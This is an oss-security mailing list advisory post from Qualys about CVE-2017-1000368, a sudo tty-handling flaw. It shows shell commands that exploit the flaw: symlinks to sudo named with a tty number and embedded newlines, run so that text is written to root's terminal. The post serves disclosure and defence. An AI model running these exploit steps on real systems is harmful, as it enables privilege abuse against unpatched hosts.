Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 6 Jun 2017 15:31:00 -0700
From: Qualys Security Advisory <qsa@...lys.com>
To: oss-security@...ts.openwall.com
Subject: Re: Arbitrary terminal access via sudo on Linux

On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
> However, the arbitrary tty access IS exploitable in 1.8.20p1.

For example, against Sudo < 1.8.20p1:

$ /usr/bin/sudo -l
...
User john may run the following commands on localhost:
    (nobody) /usr/bin/sum

$ ln -s /usr/bin/sudo '     1026 '
(1026 is tty2, currently used by root)

$ ./'     1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
(this is written to root's tty2)

Or, against Sudo = 1.8.20p1:

$ ln -s /usr/bin/sudo $')     1026 \n'
$ ./$')     1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'

CVE-2017-1000368 was assigned to this newline vulnerability:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368

With best regards,

-- 
the Qualys Security Advisory team

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ